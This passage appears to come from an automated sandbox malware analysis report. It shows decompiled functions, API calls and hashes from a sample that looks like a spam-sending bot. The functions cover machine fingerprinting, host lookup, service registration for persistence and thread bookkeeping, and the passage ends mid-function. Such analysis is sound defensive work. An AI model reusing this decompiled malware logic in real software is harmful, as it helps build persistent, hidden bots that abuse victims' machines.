                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountIncrementInterlockedTick$closesocket
                                                                                • String ID: %FROM_EMAIL
                                                                                • API String ID: 1869671989-2903620461
                                                                                • Opcode ID: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                • Instruction ID: d42af8c6b2a965ea856678458733e22e76da362947431b64bae5ca4b60480fb9
                                                                                • Opcode Fuzzy Hash: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                • Instruction Fuzzy Hash: 6C318F7190024CDFDF25DFA9DC49AE97BF8EB44700F205066FA26A2151DB71DA85CF10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408CEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E00408CEE() {
				intOrPtr* _v8;
				intOrPtr _v12;
				long _t15;
				char _t17;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t25;
				signed int _t31;
				signed char _t35;
				signed int _t36;
				char* _t41;
				intOrPtr* _t42;
				signed int _t45;
				void* _t49;

				_push(_t34);
				_t31 = 0;
				_t49 =  *0x413380 - _t31; // 0x0
				if(_t49 == 0) {
					L17:
					return _t15;
				}
				_t15 = GetTickCount() -  *0x413388;
				if(_t15 < 0xea60) {
					goto L17;
				}
				_t41 =  *0x413380; // 0x0
				_t17 =  *_t41;
				_t45 =  *(_t41 + 1);
				_t42 = _t41 + 5;
				_v12 = _t17;
				if(_t17 <= 0) {
					L16:
					_t15 = GetTickCount();
					 *0x413388 = _t15;
					goto L17;
				} else {
					_v8 = _t42;
					do {
						_t35 =  *_v8;
						if(_t35 != 8) {
							if(_t35 != 9) {
								_t36 = _t35;
								_t19 =  *((intOrPtr*)(0x413300 + _t36 * 4));
								if(_t19 == 0) {
									goto L12;
								}
								_t9 = _t19 + 0x34; // 0x3b10c483
								if(_t36 ==  *_t9) {
									_t13 = _t19 + 0x50; // 0x7486850
									_t20 =  *_t13;
									if(_t20 != 0) {
										 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
									}
									goto L16;
								}
								goto L12;
							}
							_t25 = E0040A688(_t45 >> _t35 & 0x00000001);
							L8:
							if(_t25 != 0) {
								_t6 = _v8 + 1; // 0x3cc6
								_t45 = _t45 |  *_t6;
							}
							goto L12;
						}
						_t25 = E0040A677(_t45 >> _t35 & 0x00000001);
						goto L8;
						L12:
						_v8 = _v8 + 5;
						_t31 = _t31 + 1;
					} while (_t31 < _v12);
					goto L16;
				}
			}

















                                                                                0x00408cf2
                                                                                0x00408cf4
                                                                                0x00408cf6
                                                                                0x00408cfc
                                                                                0x00408dae
                                                                                0x00408db0
                                                                                0x00408db0
                                                                                0x00408d08
                                                                                0x00408d13
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408d1b
                                                                                0x00408d21
                                                                                0x00408d24
                                                                                0x00408d27
                                                                                0x00408d2a
                                                                                0x00408d2f
                                                                                0x00408da1
                                                                                0x00408da1
                                                                                0x00408da8
                                                                                0x00000000
                                                                                0x00408d31
                                                                                0x00408d31
                                                                                0x00408d34
                                                                                0x00408d37
                                                                                0x00408d3c
                                                                                0x00408d50
                                                                                0x00408d6c
                                                                                0x00408d6f
                                                                                0x00408d78
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00408d7a
                                                                                0x00408d7d
                                                                                0x00408d8b
                                                                                0x00408d8b
                                                                                0x00408d90
                                                                                0x00408d9e
                                                                                0x00408da0
                                                                                0x00000000
                                                                                0x00408d90
                                                                                0x00000000
                                                                                0x00408d7d
                                                                                0x00408d5a
                                                                                0x00408d5f
                                                                                0x00408d62
                                                                                0x00408d67
                                                                                0x00408d67
                                                                                0x00408d67
                                                                                0x00000000
                                                                                0x00408d62
                                                                                0x00408d46
                                                                                0x00000000
                                                                                0x00408d7f
                                                                                0x00408d7f
                                                                                0x00408d83
                                                                                0x00408d84
                                                                                0x00000000
                                                                                0x00408d89

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick
                                                                                • String ID: localcfg
                                                                                • API String ID: 536389180-1857712256
                                                                                • Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                • Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
                                                                                • Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                • Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040BFCE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTickwsprintf
                                                                                • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
                                                                                • API String ID: 2424974917-1012700906
                                                                                • Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                • Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
                                                                                • Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                • Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004038F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004038F0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _t29;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr _t50;

				if(_a8 <= 0) {
					L14:
					return _t29;
				}
				_t29 = E004030FA(0x412c00);
				_v8 = 0;
				if(_a8 <= 0) {
					L13:
					 *0x412c00 =  *0x412c00 & 0x00000000;
					goto L14;
				} else {
					do {
						_t50 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + _v8 * 4))));
						_t45 =  *((intOrPtr*)(_t50 - 0x24));
						if( *((intOrPtr*)(_t50 - 0x14)) != GetCurrentThreadId()) {
							_t10 = _t50 - 0x1c;
							 *_t10 =  *(_t50 - 0x1c) - 1;
							if( *_t10 < 0) {
								 *(_t50 - 0x1c) =  *(_t50 - 0x1c) & 0x00000000;
							}
							 *((intOrPtr*)(_t50 - 0x14)) = GetCurrentThreadId();
						}
						 *((intOrPtr*)(_t50 - 0xc)) =  *((intOrPtr*)(_t50 - 0xc)) + 1;
						if( *((intOrPtr*)(_t50 - 0xc)) >=  *((intOrPtr*)(_t50 - 8))) {
							_t43 = 2;
							 *((intOrPtr*)(_t50 - 0x20)) = _t43;
							 *((intOrPtr*)(_t45 + 0x10)) =  *((intOrPtr*)(_t45 + 0x10)) + 1;
							_t34 =  *((intOrPtr*)(_t45 + 0x10));
							if( *((intOrPtr*)(_t45 + 0x10)) >=  *((intOrPtr*)(_t45 + 0x14))) {
								 *((intOrPtr*)(_t45 + 8)) = _t43;
								if( *0x412bfc == 0) {
									E00406509(_t34);
									 *0x412bfc = 1;
								}
							}
						}
						_v8 = _v8 + 1;
						_t29 = _v8;
					} while (_t29 < _a8);
					goto L13;
				}
			}








                                                                                0x004038fa
                                                                                0x00403989
                                                                                0x0040398b
                                                                                0x0040398b
                                                                                0x00403905
                                                                                0x0040390b
                                                                                0x00403911
                                                                                0x00403982
                                                                                0x00403982
                                                                                0x00000000
                                                                                0x00403913
                                                                                0x0040391b
                                                                                0x00403924
                                                                                0x00403926
                                                                                0x0040392e
                                                                                0x00403930
                                                                                0x00403930
                                                                                0x00403933
                                                                                0x00403935
                                                                                0x00403935
                                                                                0x0040393b
                                                                                0x0040393b
                                                                                0x0040393e
                                                                                0x00403947
                                                                                0x0040394b
                                                                                0x0040394c
                                                                                0x0040394f
                                                                                0x00403952
                                                                                0x00403958
                                                                                0x0040395a
                                                                                0x00403964
                                                                                0x00403966
                                                                                0x0040396b
                                                                                0x0040396b
                                                                                0x00403964
                                                                                0x00403958
                                                                                0x00403975
                                                                                0x00403978
                                                                                0x0040397b
                                                                                0x00000000
                                                                                0x00403981

                                                                                APIs
                                                                                  • Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
                                                                                  • Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00403929
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00403939
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentThread$CountExchangeInterlockedTick
                                                                                • String ID: %FROM_EMAIL
                                                                                • API String ID: 3716169038-2903620461
                                                                                • Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                • Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
                                                                                • Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                • Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3709D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 00E370BC
                                                                                • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,?,?), ref: 00E370F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountLookupUser
                                                                                • String ID: |
                                                                                • API String ID: 2370142434-2343686810
                                                                                • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                • Instruction ID: fdbb513525b7c7cb9642446e38ae0d3d1ac283c73ed57f78c06feba0e630109d
                                                                                • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                • Instruction Fuzzy Hash: 27113CB390511CEBDF21CFD4DC88ADEBBBCAB04305F1451A6E541F6090D6709B88CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401B71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 60%
                                                                                			E00401B71() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				signed int _t12;
				signed int _t28;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v8 = 0;
				asm("stosb");
				_v12 = 0xf;
				_t12 = E00401AC3();
				GetComputerNameA( &_v28,  &_v12);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0);
				_t28 = (_v28 ^ _v8 ^ _t12) & 0x7fffffff;
				_v8 = _t28;
				if(_t28 == 0) {
					return E0040ECA5() & 0x7fffffff;
				}
				return _t28;
			}









                                                                                0x00401b7e
                                                                                0x00401b84
                                                                                0x00401b85
                                                                                0x00401b86
                                                                                0x00401b87
                                                                                0x00401b89
                                                                                0x00401b8c
                                                                                0x00401b8d
                                                                                0x00401b94
                                                                                0x00401ba3
                                                                                0x00401bb8
                                                                                0x00401bc8
                                                                                0x00401bca
                                                                                0x00401bcd
                                                                                0x00000000
                                                                                0x00401bd8
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                  • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                • GetComputerNameA.KERNEL32 ref: 00401BA3
                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                • String ID: localcfg
                                                                                • API String ID: 2777991786-1857712256
                                                                                • Opcode ID: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                • Instruction ID: 3328142983dde5627d9ce9a8d7cd594e0c2b91da8c15a082e229c164244e8f4a
                                                                                • Opcode Fuzzy Hash: 347cd581b463f90e4869c942ce5ddbd7b1215e33c70616b3ab33c256474cc11e
                                                                                • Instruction Fuzzy Hash: BE018BB2D0010CBFEB009BE9CC819EFFABCAB48754F150072A601F3190E6746E084AA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040AB81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040AB81(intOrPtr _a4, intOrPtr _a8, char _a12, CHAR* _a16, char _a20) {
				void* _t15;
				long _t17;
				signed int _t29;
				long* _t31;

				_t29 = 0;
				if(_a8 > 0) {
					do {
						_t31 = _a4 + _t29 * 4;
						_t17 =  *_t31;
						if( *((char*)(_t17 + 0x10)) == 1 &&  *((char*)(_t17 + 0x12)) == 0) {
							 *((char*)(_t17 + 0x11)) = _a20;
							lstrcpynA( *_t31 + 0x12, _a16, 0x3e);
							 *((char*)( *_t31 + 0x4f)) = 0;
							 *((char*)( *_t31 + 0x10)) = _a12;
							if( *((char*)( *_t31 + 0x10)) != 2) {
								_t17 = InterlockedIncrement(0x413640);
							} else {
								_t17 = InterlockedIncrement(0x41363c);
							}
						}
						_t29 = _t29 + 1;
					} while (_t29 < _a8);
					return _t17;
				}
				return _t15;
			}







                                                                                0x0040ab85
                                                                                0x0040ab8a
                                                                                0x0040ab94
                                                                                0x0040ab97
                                                                                0x0040ab9a
                                                                                0x0040aba0
                                                                                0x0040abab
                                                                                0x0040abb9
                                                                                0x0040abc4
                                                                                0x0040abca
                                                                                0x0040abd3
                                                                                0x0040abe1
                                                                                0x0040abd5
                                                                                0x0040abe1
                                                                                0x0040abe1
                                                                                0x0040abe1
                                                                                0x0040abe3
                                                                                0x0040abe4
                                                                                0x00000000
                                                                                0x0040abea
                                                                                0x0040abed

                                                                                APIs
                                                                                • lstrcpynA.KERNEL32(?,?,0000003E,?,%FROM_EMAIL,00000000,?,0040BD6F,?,?,0000000B,no locks and using MX is disabled,000000FF), ref: 0040ABB9
                                                                                • InterlockedIncrement.KERNEL32(00413640), ref: 0040ABE1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: IncrementInterlockedlstrcpyn
                                                                                • String ID: %FROM_EMAIL
                                                                                • API String ID: 224340156-2903620461
                                                                                • Opcode ID: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                • Instruction ID: 7c747491fd5973eaabf4003e0d871bd0eed893c7530145efd7f06e2bf3dfd35d
                                                                                • Opcode Fuzzy Hash: 85a21fda7c2203b6c3b9fe5e6af0625d6c65905c1dc9d9bdca14f106badbca83
                                                                                • Instruction Fuzzy Hash: D3019231508384AFDB21CF18D881F967FA5AF15314F1444A6F6805B393C3B9E995CB96
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004026B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • gethostbyaddr.WS2_32(00000000,00000004,00000002), ref: 004026C3
                                                                                • inet_ntoa.WS2_32(?), ref: 004026E4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbyaddrinet_ntoa
                                                                                • String ID: localcfg
                                                                                • API String ID: 2112563974-1857712256
                                                                                • Opcode ID: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                • Instruction ID: d2c247fa2f64166219b22d1ecfca1b9a377bc480b126e4bf322f1ec8134a793b
                                                                                • Opcode Fuzzy Hash: d53564beee30921141880bc566d8d3609085812ca2ea79526dfe3cb7d65e7849
                                                                                • Instruction Fuzzy Hash: 81F082321482097BEF006FA1ED09A9A379CEF09354F108876FA08EA0D0DBB5D950979C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409961 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00409961() {
				int _t1;
				void* _t4;
				void* _t5;
				void* _t6;
				intOrPtr _t10;
				int _t11;

				_t1 = RegisterServiceCtrlHandlerA("htdzdeug", E00409867);
				 *0x413390 = _t1;
				if(_t1 == 0) {
					L6:
					return _t1;
				}
				 *0x413394 = 0x10;
				 *0x4133a4 = 0;
				_t1 = E00409892(2, 0, 0xbb8);
				_t6 = _t5 + 0xc;
				if(_t1 != 0) {
					_t1 = E00409892(4, 0, 0);
					_t6 = _t6 + 0xc;
					_t10 =  *0x4133b0; // 0x68
					if(_t10 != 0) {
						_t1 = E004098F2(_t4);
					}
				}
				_t11 =  *0x413390; // 0x5cea48
				if(_t11 == 0) {
					goto L6;
				} else {
					return E00409892(1, 0, 0);
				}
			}









                                                                                0x0040996c
                                                                                0x00409974
                                                                                0x0040997b
                                                                                0x004099cf
                                                                                0x004099cf
                                                                                0x004099cf
                                                                                0x00409985
                                                                                0x0040998f
                                                                                0x00409995
                                                                                0x0040999a
                                                                                0x0040999f
                                                                                0x004099a5
                                                                                0x004099aa
                                                                                0x004099ad
                                                                                0x004099b3
                                                                                0x004099b5
                                                                                0x004099b5
                                                                                0x004099b3
                                                                                0x004099ba
                                                                                0x004099c0
                                                                                0x00000000
                                                                                0x004099c2
                                                                                0x00000000
                                                                                0x004099cb

                                                                                APIs
                                                                                • RegisterServiceCtrlHandlerA.ADVAPI32(htdzdeug,Function_00009867), ref: 0040996C
                                                                                  • Part of subcall function 00409892: SetServiceStatus.SECHOST(00413394), ref: 004098EB
                                                                                  • Part of subcall function 004098F2: Sleep.KERNEL32(000003E8,00000100,004122F8,0040A3C7), ref: 00409909
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CtrlHandlerRegisterSleepStatus
                                                                                • String ID: H\$htdzdeug
                                                                                • API String ID: 1317371667-2215252167
                                                                                • Opcode ID: ca430b9e4608bea333335a69787ed6bca2f17ce8de0e46e285fa1f472da398df
                                                                                • Instruction ID: 8090f714d00e8c700c7feefac428721607cdcb0429ac14865b211bf96103553c
                                                                                • Opcode Fuzzy Hash: ca430b9e4608bea333335a69787ed6bca2f17ce8de0e46e285fa1f472da398df
                                                                                • Instruction Fuzzy Hash: 55F054F2550308AEE2106F616D87B537548A711349F08C03FB919693D3EBBD4D44822D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402684 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • inet_addr.WS2_32(00000001), ref: 00402693
                                                                                • gethostbyname.WS2_32(00000001), ref: 0040269F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynameinet_addr
                                                                                • String ID: time_cfg
                                                                                • API String ID: 1594361348-2401304539
                                                                                • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
                                                                                • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                • Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EAE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040EAE4(CHAR* _a4) {
				struct HINSTANCE__* _t2;

				_t2 =  *0x4136f4; // 0x0
				if(_t2 != 0) {
					L3:
					return GetProcAddress(_t2, _a4);
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x4136f4 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}




                                                                                0x0040eae4
                                                                                0x0040eaeb
                                                                                0x0040eb02
                                                                                0x0040eb0d
                                                                                0x0040eaed
                                                                                0x0040eaf2
                                                                                0x0040eaf8
                                                                                0x0040eaff
                                                                                0x00000000
                                                                                0x0040eb01
                                                                                0x0040eb01
                                                                                0x0040eb01
                                                                                0x0040eaff

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,76A1F210,80000001,00000000), ref: 0040EAF2
                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040EB07
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: ntdll.dll
                                                                                • API String ID: 2574300362-2227199552
                                                                                • Opcode ID: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                • Instruction ID: 7b5812d5d2c037db56fb7cc720bc5ad28be2e092f3141d28ea6626f847aa1f88
                                                                                • Opcode Fuzzy Hash: b4eb004c93ce830f66033c1bec013b2cb76b73adf8dbcf645c2d99c100687d31
                                                                                • Instruction Fuzzy Hash: D0D0C934600302ABCF22CF65AE1EA867AACAB54702B40C436B406E1670E778E994DA0C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E33189 Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00E32F88: GetModuleHandleA.KERNEL32(?), ref: 00E32FA1
                                                                                  • Part of subcall function 00E32F88: LoadLibraryA.KERNEL32(?), ref: 00E32FB1
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E331DA
                                                                                • HeapFree.KERNEL32(00000000), ref: 00E331E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                • String ID:
                                                                                • API String ID: 1017166417-0
                                                                                • Opcode ID: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                • Instruction ID: e4710c1319efc4a86c336793d044e9fdccf72480af68a12908dfe76da7ce7d2b
                                                                                • Opcode Fuzzy Hash: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                • Instruction Fuzzy Hash: 25519C7190020AEFCF059F68D8889FABBB5FF15304F145569EC96E7221E732DA19CB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402F22 Relevance: 5.2, APIs: 4, Instructions: 157memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00402F22(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				void* _v12;
				char _v368;
				void* _t64;
				signed short* _t66;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t76;
				intOrPtr* _t82;
				short _t86;
				intOrPtr* _t87;
				signed int _t94;
				intOrPtr _t96;
				signed int _t99;
				short* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr* _t116;
				void* _t117;
				signed int _t118;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t116 = _a12;
				_t94 = 0;
				 *_t116 = 0;
				_t117 = E00402D21(_a4);
				if(_t117 != 0) {
					if( *_t117 != 0) {
						_v12 = _t117;
						_a12 = _a8;
						while(_t94 < 5) {
							_t9 = _t117 + 8; // 0x8
							_t104 = _t9;
							_t82 = _t9;
							_t10 = _t82 + 1; // 0x9
							_v8 = _t10;
							do {
								_t114 =  *_t82;
								_t82 = _t82 + 1;
							} while (_t114 != 0);
							E0040EE08(_a12, _t104, _t82 - _v8 + 1);
							_t86 =  *((intOrPtr*)(_t117 + 4));
							_a12 = _a12 + 0x100;
							_t122 = _t122 + 0xc;
							 *_t116 =  *_t116 + 1;
							_t117 =  *_t117;
							 *((short*)(_t121 + _t94 * 2 - 0x6c)) = _t86;
							_t94 = _t94 + 1;
							if(_t117 != 0) {
								continue;
							}
							break;
						}
						HeapFree(GetProcessHeap(), 0, _v12);
						_v8 = _v8 & 0x00000000;
						if( *_t116 == 1) {
							L24:
							return 1;
						}
						_t64 =  *_t116 - 1;
						_a12 = _a8;
						do {
							_t118 = _v8;
							_t99 = _t118;
							if(_t118 >=  *_t116 - 1) {
								L17:
								_t66 = _t121 + _v8 * 2 - 0x6c;
								_t100 = _t121 + _t118 * 2 - 0x6c;
								 *_t66 =  *_t100;
								_t67 = _a12;
								 *_t100 =  *_t66 & 0x0000ffff;
								_t101 = _t67 + 1;
								do {
									_t109 =  *_t67;
									_t67 = _t67 + 1;
								} while (_t109 != 0);
								E0040EE08( &_v368, _a12, _t67 - _t101 + 1);
								_t123 = _t122 + 0xc;
								_t120 = (_t118 << 8) + _a8;
								_t72 = (_t118 << 8) + _a8;
								_t102 = _t72 + 1;
								do {
									_t110 =  *_t72;
									_t72 = _t72 + 1;
								} while (_t110 != 0);
